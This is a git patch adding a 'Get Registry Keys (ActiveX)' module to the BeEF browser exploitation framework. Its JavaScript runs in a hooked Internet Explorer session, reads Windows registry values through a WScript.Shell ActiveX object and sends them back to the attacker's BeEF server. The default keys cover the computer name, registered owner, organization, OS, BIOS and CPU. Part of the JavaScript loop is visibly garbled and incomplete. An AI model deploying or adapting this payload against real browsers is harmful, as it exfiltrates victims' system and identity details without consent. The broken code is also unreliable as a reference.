From f902e16ebaf19f3b5e56c3cb9419c5e8cee53d00 Mon Sep 17 00:00:00 2001 From: "bcoles@gmail.com" Date: Sun, 23 Oct 2011 08:26:29 +0000 Subject: [PATCH] Added module: Get Registry Keys (ActiveX) Retrieves the values of Windows Registry keys using ActiveX. The user will be prompted to run the ActiveX control. git-svn-id: https://beef.googlecode.com/svn/trunk@1377 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- modules/host/get_registry_keys/command.js | 58 ++++++++++++++++++++++ modules/host/get_registry_keys/config.yaml | 26 ++++++++++ modules/host/get_registry_keys/module.rb | 43 ++++++++++++++++ 3 files changed, 127 insertions(+) create mode 100644 modules/host/get_registry_keys/command.js create mode 100644 modules/host/get_registry_keys/config.yaml create mode 100644 modules/host/get_registry_keys/module.rb diff --git a/modules/host/get_registry_keys/command.js b/modules/host/get_registry_keys/command.js new file mode 100644 index 000000000..9b2f68457 --- /dev/null +++ b/modules/host/get_registry_keys/command.js @@ -0,0 +1,58 @@ +// +// Copyright 2011 Wade Alcorn wade@bindshell.net +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.execute(function() { + + var internal_counter = 0; + var result; + var key_paths; + + function waituntilok() { + try { + var wsh = new ActiveXObject("WScript.Shell"); + if (!wsh) throw("failed to create registry object"); + else { + for (var i=0; i', <%= @command_id %>, 'key_values='+result); + } + } + return; + } catch (e) { + internal_counter++; + if (internal_counter > 30) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'key_values=time out'); + return; + } + setTimeout(function() {waituntilok()},1000); + } + } + + try { + key_paths = "<%= @key_paths.gsub!(/[\n|\r\n]+/, "|BEEFDELIMITER|").gsub!(/\\/, "\\\\\\") %>".split(/\|BEEFDELIMITER\|/); + setTimeout(function() {waituntilok()},5000); + } catch (e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'key_values=malformed registry keys were supplied'); + } + +}); + diff --git a/modules/host/get_registry_keys/config.yaml b/modules/host/get_registry_keys/config.yaml new file mode 100644 index 000000000..568ee396c --- /dev/null +++ b/modules/host/get_registry_keys/config.yaml @@ -0,0 +1,26 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +beef: + module: + get_registry_keys: + enable: true + category: "Host" + name: "Get Registry Keys (ActiveX)" + description: "Retrieves the values of Windows Registry keys using ActiveX.

The user will be prompted to run the ActiveX control.

Note: each registry key must be placed on a new line." + authors: ["bcoles"] + target: + user_notify: ["IE"] + not_working: ["ALL"] diff --git a/modules/host/get_registry_keys/module.rb b/modules/host/get_registry_keys/module.rb new file mode 100644 index 000000000..61c52ced6 --- /dev/null +++ b/modules/host/get_registry_keys/module.rb @@ -0,0 +1,43 @@ +# +# Copyright 2011 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +class Get_registry_keys < BeEF::Core::Command + + def self.options + return [ + { 'name'=>'key_paths', 'ui_label' => 'Key(s)', 'description' => 'Enter registry keys. Note: each key requires its own line', 'type'=>'textarea', 'value'=>'HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\SystemProductName +HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\SystemManufacturer +HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\BIOSVersion +HKLM\\SYSTEM\\CurrentControlSet\\Control\\SystemInformation\\BIOSReleaseDate +HKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ComputerName\\ComputerName +HKLM\\SYSTEM\\CurrentControlSet\\Control\\ComputerName\\ActiveComputerName\\ComputerName +HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOwner +HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\RegisteredOrganization +HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName +HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\\ProcessorNameString +HKLM\\HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\\Identifier' +} + ] + end + + def post_execute + content = {} + content['result'] = @datastore['key_values'] if not @datastore['key_values'].nil? + content['fail'] = 'No data was returned.' if content.empty? + save content + end + +end +